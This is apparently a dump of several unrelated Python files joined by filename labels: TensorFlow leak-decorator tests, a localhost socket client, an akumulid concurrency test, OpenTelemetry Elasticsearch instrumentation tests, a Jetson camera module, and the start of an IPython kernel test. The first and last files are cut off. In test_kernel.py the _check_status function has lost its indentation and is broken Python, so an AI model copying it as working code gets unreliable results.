      def __init__(inner_self):  # pylint: disable=no-self-argument
        inner_self.assertEqual = self.assertEqual  # pylint: disable=invalid-name

      @test_util.assert_no_garbage_created
      def test_has_cycle(self):
        # A list containing itself is uncollectable without gc.
        a = []
        a.append(a)

      @test_util.assert_no_garbage_created
      def test_has_no_cycle(self):
        pass

    with self.assertRaises(AssertionError):
      ReferenceCycleTest().test_has_cycle()
    ReferenceCycleTest().test_has_no_cycle()

  @test_util.run_in_graph_and_eager_modes
  def test_no_leaked_tensor_decorator(self):
    """@assert_no_new_tensors flags tensors kept alive past the test."""

    class LeakedTensorTest(object):

      def __init__(inner_self):  # pylint: disable=no-self-argument
        inner_self.assertEqual = self.assertEqual  # pylint: disable=invalid-name

      @test_util.assert_no_new_tensors
      def test_has_leak(self):
        # Storing the tensor on self keeps it alive after the test returns.
        self.a = constant_op.constant([3.], name="leak")

      @test_util.assert_no_new_tensors
      def test_has_no_leak(self):
        constant_op.constant([3.], name="no-leak")

    with self.assertRaisesRegexp(AssertionError, "Tensors not deallocated"):
      LeakedTensorTest().test_has_leak()
    LeakedTensorTest().test_has_no_leak()

  def test_no_new_objects_decorator(self):
    """@assert_no_new_pyobjects_executing_eagerly flags object-count growth."""

    class LeakedObjectTest(object):

      def __init__(inner_self):  # pylint: disable=no-self-argument
        inner_self.assertEqual = self.assertEqual  # pylint: disable=invalid-name
        inner_self.accumulation = []

      @test_util.assert_no_new_pyobjects_executing_eagerly
      def test_has_leak(self):
        # Appending to pre-existing state accumulates objects across runs.
        self.accumulation.append([1.])

      @test_util.assert_no_new_pyobjects_executing_eagerly
      def test_has_no_leak(self):
        self.not_accumulating = [1.]

    with self.assertRaises(AssertionError):
      LeakedObjectTest().test_has_leak()
    LeakedObjectTest().test_has_no_leak()
# Run every test case in this module under the TF test runner.
if __name__ == "__main__":
  googletest.main()
|
client.py | # -*- coding: utf-8 -*-
'''
Created on 2016年4月16日
@author: fly
'''
import threading
import time
import socket
def sendToServer(client, delay=4, message='hello world.'):
    """Wait `delay` seconds, then send `message` (UTF-8 encoded) on `client`.

    Args:
        client: a connected socket-like object exposing send(bytes).
        delay: seconds to sleep before sending; defaults to 4 to preserve
            the original behavior for existing callers.
        message: text payload to send; defaults to the original literal.
    """
    time.sleep(delay)
    client.send(message.encode())
# Client script: connect once, then exercise the server for 20 rounds with
# sender threads that all share the single socket.
address = ('127.0.0.1', 31500)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(address)
i = 0
while i < 20:
    # Each round spawns a thread that sleeps 4s and then sends
    # 'hello world.' on the SAME socket while this thread blocks in recv —
    # a deliberate concurrent-access stress on the connection.
    t = threading.Thread(target=sendToServer, args=(s,))
    t.start()
    data = s.recv(512)
    time.sleep(5)
    print ('the data received is',data )
    i += 1
s.send('hihi'.encode())
s.close()
test_concurrency.py | from __future__ import print_function
import akumulid_test_tools as att
import datetime
import itertools
import json
import math
import multiprocessing
import os
import sys
import time
import traceback
try:
    # Python 2
    from urllib2 import urlopen, HTTPError
except ImportError:
    # Python 3: urlopen lives in urllib.request and HTTPError in
    # urllib.error.  (The previous fallback imported both from `urllib`,
    # which defines neither name on Python 3 — and has no HTTPError even on
    # Python 2 — so the fallback itself raised ImportError.)
    from urllib.request import urlopen
    from urllib.error import HTTPError

# Endpoints of the locally running akumulid server under test.
HOST = '127.0.0.1'
TCPPORT = 8282
HTTPPORT = 8181
"""
Test plan:
Process 1 (reader).
- Start process 2 (writer).
- Read all data in fwd direction in range [begin, end-window].
Process 2 (writer).
- Write data in range [begin, mid] in a loop.
- Long pause.
- Write data in range (mid, end] in a loop.
- Exit.
"""
def writer(dt, delta, N):
    """Send N generated 'test' series messages to the server over TCP.

    Args:
        dt: starting timestamp of the generated series.
        delta: time step between consecutive messages.
        N: number of messages to generate and send.

    Any failure is logged with a traceback and re-raised so the parent
    process sees a non-zero exit.
    """
    try:
        chan = att.TCPChan(HOST, TCPPORT)
        # fill data in
        print("Sending {0} messages through TCP...".format(N))
        tags = {
            "tag": ['Foo'],
        }
        print("Generating {0} messages...".format(N))
        messages = att.generate_messages(dt, delta, N, 'test', **tags)
        for it in messages:
            chan.send(it)
        print("{0} messages sent".format(N))
        # Give the server time to flush before the process exits.
        time.sleep(5)
    except Exception:
        # Was a bare `except:`, which would also intercept KeyboardInterrupt
        # and SystemExit; Exception keeps the log-and-reraise for real errors
        # while letting those pass through untouched.
        print("Exception in writer")
        traceback.print_exc()
        raise
def line2tup(seq):
    """Parse CSV response lines, yielding (tagline, timestamp, value) tuples.

    Args:
        seq: iterable of 'tagline, timestamp, value' CSV strings.

    On a malformed line the offending index and content are printed and the
    parse error is re-raised.
    """
    for ix, line in enumerate(seq):
        try:
            columns = line.split(',')
            tagline = columns[0].strip()
            timestamp = att.parse_timestamp(columns[1].strip())
            value = float(columns[2].strip())
            yield tagline, timestamp, value
        except Exception:
            # Narrowed from a bare `except:` so Ctrl-C is not swallowed into
            # the per-line error report; real parse errors still re-raise.
            print("Error in line: {0}".format(ix))
            print(line)
            raise
def require_continuous(seq, fn):
    """Verify that *seq* is ordered correctly and has no gaps.

    ``fn(current, previous)`` is invoked for every adjacent pair and is
    expected to raise when the pair violates the required ordering.

    Returns:
        Tuple of the first and last elements seen, or ``(None, None)``
        for an empty sequence.
    """
    first = last = None
    for item in seq:
        if first is None:
            first = item
        else:
            fn(item, last)
        last = item
    return first, last
# Total number of response lines consumed by reader(); incremented from the
# count_lines generator via `global processed` so the finally-block can
# report progress even on failure.
processed = 0
def reader(dtstart, delta, N):
    """Read the 'test' series over HTTP while a writer process fills it in.

    Spawns writer() as a child process, then repeatedly queries
    [begin, end) — advancing `begin` to the last timestamp received — until
    the final expected point (end - delta) appears.  Raises on out-of-order
    or gapped data, and after 10 HTTP errors.
    """
    # Start writer process
    wproc = multiprocessing.Process(name='Writer', target=writer, args=[dtstart, delta, N])
    wproc.start()

    def cmp_tuples(lhs, rhs):
        # ignore tags — only timestamp spacing and value increments matter.
        timedelta = lhs[1] - rhs[1]
        if timedelta != delta:
            raise ValueError("Invalid timestamps, current {0}, previous {1}".format(lhs[1], rhs[1]))
        valdelta = lhs[2] - rhs[2]
        # generated values are expected to grow by 1.0 per step
        if valdelta - 1.0 > 0.000001:
            raise ValueError("Invalid value, current {0}, previous {1}".format(lhs[2], rhs[2]))

    try:
        print("Test #1")
        end = dtstart + delta*N
        begin = dtstart
        timedelta = end - begin  # NOTE(review): computed but never used
        query_params = {"output": { "format": "csv" }}
        http_err_cnt = 0
        while True:
            try:
                query = att.makequery("test", begin, end, **query_params)
                print("Query: {0}".format(query))
                queryurl = "http://{0}:{1}/api/query".format(HOST, HTTPPORT)
                # NOTE(review): on Python 3, urlopen's data argument must be
                # bytes while json.dumps returns str — confirm this script
                # targets Python 2 or encode the payload.
                response = urlopen(queryurl, json.dumps(query))

                def count_lines(seq):
                    # Pass-through generator counting consumed lines for the
                    # progress report in the finally-block below.
                    global processed
                    for msg in seq:
                        yield msg
                        processed += 1

                tuples = line2tup(count_lines(response))
                first, last = require_continuous(tuples, cmp_tuples)
                print("First: {0}".format(first and first[1].strftime("%Y%m%dT%H%M%S.%f") or "None"))
                print("Last : {0}".format( last and last[1].strftime("%Y%m%dT%H%M%S.%f") or "None"))
                if last is not None:
                    # Resume the next poll from the last timestamp seen.
                    begin = last[1]
                    if first[1] == (end - delta):
                        break
            except HTTPError as err:
                print("HTTP error: {0}".format(err))
                http_err_cnt += 1
                if http_err_cnt == 10:
                    raise
        print("Test passed")
    finally:
        print("{0} messages processed".format(processed))
        wproc.join()
def main(path, debug=False):
    """Run the concurrency test against the akumulid binary at *path*.

    When *debug* is falsy, the database is reset and the server started
    here (and stopped in the finally-block); otherwise an already-running
    server is assumed.
    """
    if not os.path.exists(path):
        print("Path {0} doesn't exists".format(path))
        sys.exit(1)
    akumulid = att.Akumulid(path)
    if not debug:
        # Reset database
        akumulid.delete_database()
        akumulid.create_database()
        # start ./akumulid server
        print("Starting server...")
        akumulid.serve()
        time.sleep(5)
    else:
        print("Akumulid should be started first")
    try:
        dt = datetime.datetime.utcnow()
        delta = datetime.timedelta(milliseconds=1)
        nmsgs = 1000000
        # reader() spawns the writer process itself, so one child suffices.
        rproc = multiprocessing.Process(name='Reader', target=reader, args=[dt, delta, nmsgs])
        rproc.start()
        rproc.join()
    except:
        traceback.print_exc()
        raise
    finally:
        if not debug:
            print("Stopping server...")
            akumulid.stop()
            time.sleep(5)
if __name__ == '__main__':
    print(' '.join(sys.argv))
    if len(sys.argv) < 2:
        print("Not enough arguments")
        sys.exit(1)
    # An optional third argument equal to 'debug' attaches to an
    # already-running server instead of managing one.
    main(sys.argv[1], sys.argv[2] == 'debug' if len(sys.argv) == 3 else False)
else:
    raise ImportError("This module shouldn't be imported")
|
test_elasticsearch.py | # Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import threading
from ast import literal_eval
from unittest import mock
import elasticsearch
import elasticsearch.exceptions
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
import opentelemetry.instrumentation.elasticsearch
from opentelemetry import trace
from opentelemetry.instrumentation.elasticsearch import (
ElasticsearchInstrumentor,
)
from opentelemetry.semconv.trace import SpanAttributes
from opentelemetry.test.test_base import TestBase
from opentelemetry.trace import StatusCode
# Select the helper module matching the installed elasticsearch client's
# major version; each provides version-specific fixtures (Article model,
# expected DSL statements, URLs, span names).
major_version = elasticsearch.VERSION[0]
if major_version == 7:
    from . import helpers_es7 as helpers  # pylint: disable=no-name-in-module
elif major_version == 6:
    from . import helpers_es6 as helpers  # pylint: disable=no-name-in-module
elif major_version == 5:
    from . import helpers_es5 as helpers  # pylint: disable=no-name-in-module
else:
    from . import helpers_es2 as helpers  # pylint: disable=no-name-in-module
Article = helpers.Article
@mock.patch(
    "elasticsearch.connection.http_urllib3.Urllib3HttpConnection.perform_request"
)
class TestElasticsearchIntegration(TestBase):
    """Integration tests for the elasticsearch instrumentation.

    The class-level mock.patch replaces the urllib3 transport's
    perform_request, so every test method receives a `request_mock`
    argument and no real network traffic occurs.
    """

    def setUp(self):
        """Instrument the elasticsearch client and grab a tracer."""
        super().setUp()
        self.tracer = self.tracer_provider.get_tracer(__name__)
        ElasticsearchInstrumentor().instrument()

    def tearDown(self):
        """Uninstrument (logging silenced to suppress repeat warnings)."""
        super().tearDown()
        with self.disable_logging():
            ElasticsearchInstrumentor().uninstrument()

    def test_instrumentor(self, request_mock):
        """Spans are emitted while instrumented and stop after uninstrument."""
        request_mock.return_value = (1, {}, {})
        es = Elasticsearch()
        es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
        spans_list = self.get_finished_spans()
        self.assertEqual(len(spans_list), 1)
        span = spans_list[0]
        # Check version and name in span's instrumentation info
        # self.assertEqualSpanInstrumentationInfo(span, opentelemetry.instrumentation.elasticsearch)
        self.assertEqualSpanInstrumentationInfo(
            span, opentelemetry.instrumentation.elasticsearch
        )
        # check that no spans are generated after uninstrument
        ElasticsearchInstrumentor().uninstrument()
        es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
        spans_list = self.get_finished_spans()
        self.assertEqual(len(spans_list), 1)

    def test_span_not_recording(self, request_mock):
        """A non-recording span must receive no attributes or status."""
        request_mock.return_value = (1, {}, {})
        mock_tracer = mock.Mock()
        mock_span = mock.Mock()
        mock_span.is_recording.return_value = False
        mock_tracer.start_span.return_value = mock_span
        with mock.patch("opentelemetry.trace.get_tracer") as tracer:
            tracer.return_value = mock_tracer
            Elasticsearch()
            self.assertFalse(mock_span.is_recording())
            self.assertTrue(mock_span.is_recording.called)
            self.assertFalse(mock_span.set_attribute.called)
            self.assertFalse(mock_span.set_status.called)
        ElasticsearchInstrumentor().uninstrument()

    def test_prefix_arg(self, request_mock):
        """A span-name prefix passed to the instrumentor is applied."""
        # NOTE(review): the literal reads "prefix-from-env" here and
        # "prefix-from-args" in test_prefix_env — the labels look swapped,
        # though any non-empty string exercises the code path.
        prefix = "prefix-from-env"
        ElasticsearchInstrumentor().uninstrument()
        ElasticsearchInstrumentor(span_name_prefix=prefix).instrument()
        request_mock.return_value = (1, {}, {})
        self._test_prefix(prefix)

    def test_prefix_env(self, request_mock):
        """A span-name prefix from the environment variable is applied."""
        prefix = "prefix-from-args"
        env_var = "OTEL_PYTHON_ELASTICSEARCH_NAME_PREFIX"
        os.environ[env_var] = prefix
        ElasticsearchInstrumentor().uninstrument()
        ElasticsearchInstrumentor().instrument()
        request_mock.return_value = (1, {}, {})
        # The env var is read at instrument() time, so it can be removed now.
        del os.environ[env_var]
        self._test_prefix(prefix)

    def _test_prefix(self, prefix):
        """Shared helper: verify the emitted span's name begins with prefix."""
        es = Elasticsearch()
        es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
        spans_list = self.get_finished_spans()
        self.assertEqual(len(spans_list), 1)
        span = spans_list[0]
        self.assertTrue(span.name.startswith(prefix))

    def test_result_values(self, request_mock):
        """found/timed_out/took from the response body become attributes."""
        request_mock.return_value = (
            1,
            {},
            '{"found": false, "timed_out": true, "took": 7}',
        )
        es = Elasticsearch()
        es.get(index="test-index", doc_type="tweet", id=1)
        spans = self.get_finished_spans()
        self.assertEqual(1, len(spans))
        # Values are stringified when stored on the span.
        self.assertEqual("False", spans[0].attributes["elasticsearch.found"])
        self.assertEqual(
            "True", spans[0].attributes["elasticsearch.timed_out"]
        )
        self.assertEqual("7", spans[0].attributes["elasticsearch.took"])

    def test_trace_error_unknown(self, request_mock):
        """An arbitrary exception marks the span as ERROR."""
        exc = RuntimeError("custom error")
        request_mock.side_effect = exc
        self._test_trace_error(StatusCode.ERROR, exc)

    def test_trace_error_not_found(self, request_mock):
        """A NotFoundError from the client also marks the span as ERROR."""
        msg = "record not found"
        exc = elasticsearch.exceptions.NotFoundError(404, msg)
        request_mock.return_value = (1, {}, {})
        request_mock.side_effect = exc
        self._test_trace_error(StatusCode.ERROR, exc)

    def _test_trace_error(self, code, exc):
        """Shared helper: perform a failing GET and check the span status."""
        es = Elasticsearch()
        try:
            es.get(index="test-index", doc_type="tweet", id=1)
        except Exception:  # pylint: disable=broad-except
            pass
        spans = self.get_finished_spans()
        self.assertEqual(1, len(spans))
        span = spans[0]
        self.assertFalse(span.status.is_ok)
        self.assertEqual(span.status.status_code, code)
        self.assertEqual(
            span.status.description, f"{type(exc).__name__}: {exc}"
        )

    def test_parent(self, request_mock):
        """A request inside an active span becomes that span's child."""
        request_mock.return_value = (1, {}, {})
        es = Elasticsearch()
        with self.tracer.start_as_current_span("parent"):
            es.index(
                index="sw", doc_type="people", id=1, body={"name": "adam"}
            )
        spans = self.get_finished_spans()
        self.assertEqual(len(spans), 2)
        parent = spans.by_name("parent")
        child = spans.by_name("Elasticsearch/sw/people/1")
        self.assertIsNotNone(child.parent)
        self.assertEqual(child.parent.span_id, parent.context.span_id)

    def test_multithread(self, request_mock):
        """Context propagation is per-thread, not global."""
        request_mock.return_value = (1, {}, {})
        es = Elasticsearch()
        ev = threading.Event()

        # 1. Start tracing from thread-1; make thread-2 wait
        # 2. Trace something from thread-2, make thread-1 join before finishing.
        # 3. Check the spans got different parents, and are in the expected order.
        def target1(parent_span):
            with trace.use_span(parent_span):
                es.get(index="test-index", doc_type="tweet", id=1)
                ev.set()
                ev.wait()

        def target2():
            ev.wait()
            es.get(index="test-index", doc_type="tweet", id=2)
            ev.set()

        with self.tracer.start_as_current_span("parent") as span:
            t1 = threading.Thread(target=target1, args=(span,))
            t1.start()
            t2 = threading.Thread(target=target2)
            t2.start()
            t1.join()
            t2.join()
        spans = self.get_finished_spans()
        self.assertEqual(3, len(spans))
        s1 = spans.by_name("parent")
        s2 = spans.by_name("Elasticsearch/test-index/tweet/1")
        s3 = spans.by_name("Elasticsearch/test-index/tweet/2")
        # Thread-1 explicitly used the parent span; thread-2 did not.
        self.assertIsNotNone(s2.parent)
        self.assertEqual(s2.parent.span_id, s1.context.span_id)
        self.assertIsNone(s3.parent)

    def test_dsl_search(self, request_mock):
        """A DSL Search produces one span with URL/method/statement attrs."""
        request_mock.return_value = (1, {}, '{"hits": {"hits": []}}')
        client = Elasticsearch()
        search = Search(using=client, index="test-index").filter(
            "term", author="testing"
        )
        search.execute()
        spans = self.get_finished_spans()
        span = spans[0]
        self.assertEqual(1, len(spans))
        self.assertEqual(span.name, "Elasticsearch/test-index/_search")
        self.assertIsNotNone(span.end_time)
        self.assertEqual(
            span.attributes,
            {
                SpanAttributes.DB_SYSTEM: "elasticsearch",
                "elasticsearch.url": "/test-index/_search",
                "elasticsearch.method": helpers.dsl_search_method,
                SpanAttributes.DB_STATEMENT: str(
                    {
                        "query": {
                            "bool": {
                                "filter": [{"term": {"author": "testing"}}]
                            }
                        }
                    }
                ),
            },
        )

    def test_dsl_create(self, request_mock):
        """Article.init issues a HEAD (exists) and a PUT (create mapping)."""
        request_mock.return_value = (1, {}, {})
        client = Elasticsearch()
        Article.init(using=client)
        spans = self.get_finished_spans()
        self.assertEqual(2, len(spans))
        span1 = spans.by_attr(key="elasticsearch.method", value="HEAD")
        span2 = spans.by_attr(key="elasticsearch.method", value="PUT")
        self.assertEqual(
            span1.attributes,
            {
                SpanAttributes.DB_SYSTEM: "elasticsearch",
                "elasticsearch.url": "/test-index",
                "elasticsearch.method": "HEAD",
            },
        )
        attributes = {
            SpanAttributes.DB_SYSTEM: "elasticsearch",
            "elasticsearch.url": "/test-index",
            "elasticsearch.method": "PUT",
        }
        self.assertSpanHasAttributes(span2, attributes)
        # The mapping body is version-specific; compare against the helper's.
        self.assertEqual(
            literal_eval(span2.attributes[SpanAttributes.DB_STATEMENT]),
            helpers.dsl_create_statement,
        )

    def test_dsl_index(self, request_mock):
        """Saving a DSL document produces a PUT span with the doc as body."""
        request_mock.return_value = helpers.dsl_index_result
        client = Elasticsearch()
        article = Article(
            meta={"id": 2},
            title="About searching",
            body="A few words here, a few words there",
        )
        res = article.save(using=client)
        self.assertTrue(res)
        spans = self.get_finished_spans()
        self.assertEqual(1, len(spans))
        span = spans[0]
        self.assertEqual(span.name, helpers.dsl_index_span_name)
        attributes = {
            SpanAttributes.DB_SYSTEM: "elasticsearch",
            "elasticsearch.url": helpers.dsl_index_url,
            "elasticsearch.method": "PUT",
        }
        self.assertSpanHasAttributes(span, attributes)
        self.assertEqual(
            literal_eval(span.attributes[SpanAttributes.DB_STATEMENT]),
            {
                "body": "A few words here, a few words there",
                "title": "About searching",
            },
        )

    def test_request_hook(self, request_mock):
        """A request_hook receives method/url/kwargs and may set attributes."""
        request_hook_method_attribute = "request_hook.method"
        request_hook_url_attribute = "request_hook.url"
        request_hook_kwargs_attribute = "request_hook.kwargs"

        def request_hook(span, method, url, kwargs):
            attributes = {
                request_hook_method_attribute: method,
                request_hook_url_attribute: url,
                request_hook_kwargs_attribute: json.dumps(kwargs),
            }
            if span and span.is_recording():
                span.set_attributes(attributes)

        ElasticsearchInstrumentor().uninstrument()
        ElasticsearchInstrumentor().instrument(request_hook=request_hook)
        request_mock.return_value = (
            1,
            {},
            '{"found": false, "timed_out": true, "took": 7}',
        )
        es = Elasticsearch()
        index = "test-index"
        doc_type = "tweet"
        doc_id = 1
        kwargs = {"params": {"test": True}}
        es.get(index=index, doc_type=doc_type, id=doc_id, **kwargs)
        spans = self.get_finished_spans()
        self.assertEqual(1, len(spans))
        self.assertEqual(
            "GET", spans[0].attributes[request_hook_method_attribute]
        )
        self.assertEqual(
            f"/{index}/{doc_type}/{doc_id}",
            spans[0].attributes[request_hook_url_attribute],
        )
        self.assertEqual(
            json.dumps(kwargs),
            spans[0].attributes[request_hook_kwargs_attribute],
        )

    def test_response_hook(self, request_mock):
        """A response_hook receives the parsed response body."""
        response_attribute_name = "db.query_result"

        def response_hook(span, response):
            if span and span.is_recording():
                span.set_attribute(
                    response_attribute_name, json.dumps(response)
                )

        ElasticsearchInstrumentor().uninstrument()
        ElasticsearchInstrumentor().instrument(response_hook=response_hook)
        response_payload = {
            "took": 9,
            "timed_out": False,
            "_shards": {
                "total": 1,
                "successful": 1,
                "skipped": 0,
                "failed": 0,
            },
            "hits": {
                "total": {"value": 1, "relation": "eq"},
                "max_score": 0.18232156,
                "hits": [
                    {
                        "_index": "test-index",
                        "_type": "tweet",
                        "_id": "1",
                        "_score": 0.18232156,
                        "_source": {"name": "tester"},
                    }
                ],
            },
        }
        request_mock.return_value = (
            1,
            {},
            json.dumps(response_payload),
        )
        es = Elasticsearch()
        es.get(index="test-index", doc_type="tweet", id=1)
        spans = self.get_finished_spans()
        self.assertEqual(1, len(spans))
        self.assertEqual(
            json.dumps(response_payload),
            spans[0].attributes[response_attribute_name],
        )
|
camera.py | """camera.py
This code implements the Camera class, which encapsulates code to
handle IP CAM, USB webcam or the Jetson onboard camera. In
addition, this Camera class is further extended to take a video
file or an image file as input.
This file was modified from:
https://github.com/jkjung-avt/tensorrt_demos/blob/master/utils/camera.py
"""
import logging
import threading
import subprocess
import numpy as np
import cv2
# The following flag ise used to control whether to use a GStreamer
# pipeline to open USB webcam source. If set to False, we just open
# the webcam using cv2.VideoCapture(index) machinery. i.e. relying
# on cv2's built-in function to capture images from the webcam.
USB_GSTREAMER = True
def add_camera_args(parser):
    """Register the camera-related command line options on *parser*.

    Covers video-file, image-file, RTSP (IP CAM), USB webcam and output
    resolution options.  Returns the same parser to allow chaining.
    """
    add = parser.add_argument
    add('--file', dest='use_file', action='store_true',
        help='use a video file as input (remember to '
             'also set --filename)')
    add('--image', dest='use_image', action='store_true',
        help='use an image file as input (remember to '
             'also set --filename)')
    add('--filename', dest='filename', default=None, type=str,
        help='video file name, e.g. test.mp4')
    add('--rtsp', dest='use_rtsp', action='store_true',
        help='use IP CAM (remember to also set --uri)')
    add('--uri', dest='rtsp_uri', default=None, type=str,
        help='RTSP URI, e.g. rtsp://192.168.1.64:554')
    add('--latency', dest='rtsp_latency', default=200, type=int,
        help='latency in ms for RTSP [200]')
    add('--usb', dest='use_usb', action='store_true',
        help='use USB webcam (remember to also set --vid)')
    add('--vid', dest='video_dev', default=0, type=int,
        help='device # of USB webcam (/dev/video?) [0]')
    add('--width', dest='image_width', default=640, type=int,
        help='image width [640]')
    add('--height', dest='image_height', default=480, type=int,
        help='image height [480]')
    return parser
def open_cam_rtsp(uri, width, height, latency):
    """Open an RTSP URI (IP CAM) through a GStreamer pipeline.

    Prefers the Jetson hardware H.264 decoder when it is installed and
    falls back to the software decoder otherwise.
    """
    gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
    if 'omxh264dec' in gst_elements:
        # Hardware H.264 decoding on Jetson platforms.
        pipeline = ('rtspsrc location={} latency={} ! '
                    'rtph264depay ! h264parse ! omxh264dec ! '
                    'nvvidconv ! '
                    'video/x-raw, width=(int){}, height=(int){}, '
                    'format=(string)BGRx ! videoconvert ! '
                    'appsink').format(uri, latency, width, height)
    elif 'avdec_h264' in gst_elements:
        # Software decoder fallback.
        # NOTE: in case resizing images is necessary, try adding
        # a 'videoscale' into the pipeline
        pipeline = ('rtspsrc location={} latency={} ! '
                    'rtph264depay ! h264parse ! avdec_h264 ! '
                    'videoconvert ! appsink').format(uri, latency)
    else:
        raise RuntimeError('H.264 decoder not found!')
    return cv2.VideoCapture(pipeline, cv2.CAP_GSTREAMER)
def open_cam_usb(dev, width, height):
    """Open a USB webcam (/dev/video<dev>) at the requested resolution.

    Uses a GStreamer pipeline when USB_GSTREAMER is True; otherwise falls
    back to cv2's built-in capture machinery.
    """
    if USB_GSTREAMER:
        gst_str = ('v4l2src device=/dev/video{} ! '
                   'video/x-raw, width=(int){}, height=(int){} ! '
                   'videoconvert ! appsink').format(dev, width, height)
        return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
    else:
        cap = cv2.VideoCapture(dev)
        # Fix: the width/height arguments were silently ignored on this
        # path; request the resolution from the driver explicitly.
        cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
        cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
        return cap
def open_cam_onboard(width, height):
    """Open the Jetson onboard camera.

    Picks the GStreamer source element based on what is installed:
    'nvcamerasrc' on older L4T releases, 'nvarguscamerasrc' on newer ones.
    """
    gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
    if 'nvcamerasrc' in gst_elements:
        # On versions of L4T prior to 28.1, you might need to add
        # 'flip-method=2' into gst_str below.
        gst_str = ('nvcamerasrc ! '
                   'video/x-raw(memory:NVMM), '
                   'width=(int)2592, height=(int)1458, '
                   'format=(string)I420, framerate=(fraction)30/1 ! '
                   'nvvidconv ! '
                   'video/x-raw, width=(int){}, height=(int){}, '
                   'format=(string)BGRx ! '
                   'videoconvert ! appsink').format(width, height)
    elif 'nvarguscamerasrc' in gst_elements:
        # Newer L4T releases ship the Argus-based camera source instead.
        gst_str = ('nvarguscamerasrc ! '
                   'video/x-raw(memory:NVMM), '
                   'width=(int)1920, height=(int)1080, '
                   'format=(string)NV12, framerate=(fraction)30/1 ! '
                   'nvvidconv flip-method=2 ! '
                   'video/x-raw, width=(int){}, height=(int){}, '
                   'format=(string)BGRx ! '
                   'videoconvert ! appsink').format(width, height)
    else:
        raise RuntimeError('onboard camera source not found!')
    return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def grab_img(cam):
    """Worker-thread loop: pull frames into ``cam.img_handle``.

    Runs until ``cam.thread_running`` is cleared or the capture device
    stops returning frames, then clears the flag itself.
    """
    while cam.thread_running:
        _, frame = cam.cap.read()
        cam.img_handle = frame
        if frame is None:
            logging.warning('grab_img(): cap.read() returns None...')
            break
    cam.thread_running = False
class Camera():
    """Camera class which supports reading images from these video sources:

    1. Video file
    2. Image (jpg, png, etc.) file, repeating indefinitely
    3. RTSP (IP CAM)
    4. USB webcam
    5. Jetson onboard camera
    """

    def __init__(self, args):
        self.args = args
        self.is_opened = False    # True once the source delivered a first frame
        self.use_thread = False   # live sources are read by a grabber thread
        self.thread_running = False
        self.img_handle = None    # most recent frame (shared with grab_img)
        self.img_width = 0
        self.img_height = 0
        self.cap = None           # cv2.VideoCapture, or the sentinel 'OK' for still images
        self.thread = None

    def open(self):
        """Open camera based on command line arguments."""
        assert self.cap is None, 'Camera is already opened!'
        args = self.args
        if args.use_file:
            self.cap = cv2.VideoCapture(args.filename)
            # ignore image width/height settings here
            self.use_thread = False
        elif args.use_image:
            # Still images need no capture device; the string 'OK' marks the
            # camera as (trivially) opened.
            self.cap = 'OK'
            self.img_handle = cv2.imread(args.filename)
            # ignore image width/height settings here
            if self.img_handle is not None:
                self.is_opened = True
                self.img_height, self.img_width, _ = self.img_handle.shape
            self.use_thread = False
        elif args.use_rtsp:
            self.cap = open_cam_rtsp(
                args.rtsp_uri,
                args.image_width,
                args.image_height,
                args.rtsp_latency
            )
            self.use_thread = True
        elif args.use_usb:
            self.cap = open_cam_usb(
                args.video_dev,
                args.image_width,
                args.image_height
            )
            self.use_thread = True
        else:  # by default, use the jetson onboard camera
            self.cap = open_cam_onboard(
                args.image_width,
                args.image_height
            )
            self.use_thread = True
        if self.cap != 'OK':
            if self.cap.isOpened():
                # Try to grab the 1st image and determine width and height
                _, img = self.cap.read()
                if img is not None:
                    self.img_height, self.img_width, _ = img.shape
                    self.is_opened = True

    def start(self):
        # Spawn the frame-grabbing thread for live sources (RTSP/USB/onboard).
        assert not self.thread_running
        if self.use_thread:
            self.thread_running = True
            self.thread = threading.Thread(target=grab_img, args=(self,))
            self.thread.start()

    def stop(self):
        # Signal the grabber thread to exit, then wait for it.
        self.thread_running = False
        if self.use_thread:
            self.thread.join()

    def read(self):
        """Return the current frame (video files loop; still images are copied)."""
        if self.args.use_file:
            _, img = self.cap.read()
            if img is None:
                # looping around: reopen the file to restart from the beginning
                self.cap.release()
                self.cap = cv2.VideoCapture(self.args.filename)
                _, img = self.cap.read()
            return img
        elif self.args.use_image:
            # Copy so callers may draw on the frame without corrupting the source.
            return np.copy(self.img_handle)
        else:
            return self.img_handle

    def release(self):
        # 'OK' is the still-image sentinel; only real captures need releasing.
        assert not self.thread_running
        if self.cap != 'OK':
            self.cap.release()
test_kernel.py | # coding: utf-8
"""test the IPython Kernel"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import ast
import io
import os.path
import sys
import time
import nose.tools as nt
from flaky import flaky
from IPython.testing import decorators as dec, tools as tt
from ipython_genutils import py3compat
from IPython.paths import locate_profile
from ipython_genutils.tempdir import TemporaryDirectory
from .utils import (
new_kernel, kernel, TIMEOUT, assemble_output, execute,
flush_channels, wait_for_idle,
)
def _check_master(kc, expected=True, stream="stdout"):
    """Assert that the kernel's iostream *stream* reports being the master process."""
    execute(kc=kc, code="import sys")
    flush_channels(kc)
    execute(kc=kc, code="print (sys.%s._is_master_process())" % stream)
    out, _ = assemble_output(kc.iopub_channel)
    assert out.strip() == repr(expected)
def _check_status(content):
"""If status=error, show the traceback"""
if content['status'] == 'error':
assert False, ''.join(['\n'] + content['traceback'])
# printing tests
def test_simple_print():
    """A simple print statement reaches the iopub stdout stream."""
    with kernel() as kc:
        execute(kc=kc, code="print ('hi')")
        out, err = assemble_output(kc.iopub_channel)
        assert out == 'hi\n'
        assert err == ''
        _check_master(kc, expected=True)
def test_sys_path():
    """sys.path in the kernel should still contain '' (the cwd) by default."""
    with kernel() as kc:
        execute(kc=kc, code="import sys; print(repr(sys.path))")
        out, err = assemble_output(kc.iopub_channel)
